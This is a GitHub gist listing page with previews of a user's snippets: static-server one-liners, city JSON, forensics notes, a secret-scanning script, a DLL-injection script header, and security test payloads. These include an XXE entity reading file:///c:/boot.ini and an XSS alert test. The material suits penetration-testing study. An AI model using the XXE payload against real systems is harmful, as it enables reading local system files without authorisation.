Each of these commands will run an ad hoc http static server in your current (or specified) directory, available at http://localhost:8000. Use this power wisely.
$ python -m SimpleHTTPServer 8000
wb4r wb4r
wb4r
/ cobalt.html
Created
November 17, 2018 13:26
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!DOCTYPE html> | |
| <html lang="en" dir="ltr"> | |
| <head> | |
| <meta charset="utf-8"> | |
| <title>cobalt</title> | |
| </head> | |
| <body> | |
| <h1>test</h1> | |
| <script type="text/javascript"> | |
| window.onload = function(){ |
wb4r
/ cobalt.xml
Created
November 16, 2018 16:58
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version="1.0" encoding="ISO-8859-1"?> | |
| <!DOCTYPE foo [ | |
| <!ELEMENT foo ANY > | |
| <!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]><foo>&xxe;</foo> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| window.onload = function(){ | |
| alert("COBALT XSS") | |
| }; |
wb4r
/ github_repos_cloner_n_trufflehog_n_gittyleaks_checker.sh
Created
November 1, 2018 09:15
github repos cloner + trufflehog & gittyleaks checker
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| USERNAME=$1 | |
| # Only reads 200 for now. Havent implemented token + page iteration to extend this | |
| # Show repo name when showing findings | |
| # display help/usage | |
| # display need of install pip install gittyleaks => pip list --format=legacy | grep -F gittyleaks | |
| # AND trufflehog => pip install truffleHog |
wb4r
/ web-servers.md
Created
November 29, 2017 15:08
— forked from willurd/web-servers.md
Big list of http static server one-liners
wb4r
/ cities.json
Created
September 19, 2017 14:40
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| [ | |
| { | |
| "city": "New York", | |
| "growth_from_2000_to_2013": "4.8%", | |
| "latitude": 40.7127837, | |
| "longitude": -74.0059413, | |
| "population": "8405837", | |
| "rank": "1", | |
| "state": "New York" | |
| }, |
wb4r
/ cities.json
Created
September 19, 2017 14:40
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| [ | |
| { | |
| "city": "New York", | |
| "growth_from_2000_to_2013": "4.8%", | |
| "latitude": 40.7127837, | |
| "longitude": -74.0059413, | |
| "population": "8405837", | |
| "rank": "1", | |
| "state": "New York" | |
| }, |
wb4r
/ dllinject-reduced.py
Last active
April 11, 2024 03:00
This script is a reduced version of the original used in www.nordicmelon.com/shell-migration-without-meterpreter ---The original script can be found here => github.com/psychomario/pyinject/blob/master/dllinject.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Original project at https://github.com/psychomario/pyinject | |
| # The project is licensed under the terms of the MIT license; see | |
| # accompanying LICENSE.md for details. | |
| import ctypes | |
| import ctypes.wintypes as wintypes | |
| wintypes.LPTSTR = ctypes.POINTER(ctypes.c_char) | |
| wintypes.LPBYTE = ctypes.POINTER(ctypes.c_ubyte) | |
| wintypes.HANDLE = ctypes.c_void_p |
wb4r
/ dllinject-reduced.py
Created
June 25, 2017 17:20
The original script can be found here: https://github.com/psychomario/pyinject/blob/master/dllinject.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Original project at https://github.com/psychomario/pyinject | |
| # The project is licensed under the terms of the MIT license; see | |
| # accompanying LICENSE.md for details. | |
| import ctypes | |
| import ctypes.wintypes as wintypes | |
| wintypes.LPTSTR = ctypes.POINTER(ctypes.c_char) | |
| wintypes.LPBYTE = ctypes.POINTER(ctypes.c_ubyte) | |
| wintypes.HANDLE = ctypes.c_void_p |
wb4r
/ digitalforensics-examNotes.txt
Created
February 22, 2017 13:01
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| [0] FIND / GREP | |
| notes-w1.txt | |
| [*] FIND | |
| - Depth | |
| $ find . -maxdepth 1 | |
| - Find and then copy (exec) | |
| $ ... -exec cp {} /home/caine/etccopy/ \; | |
| - Size: | |
| c (bytes) | |
| k (kilobytes) |
NewerOlder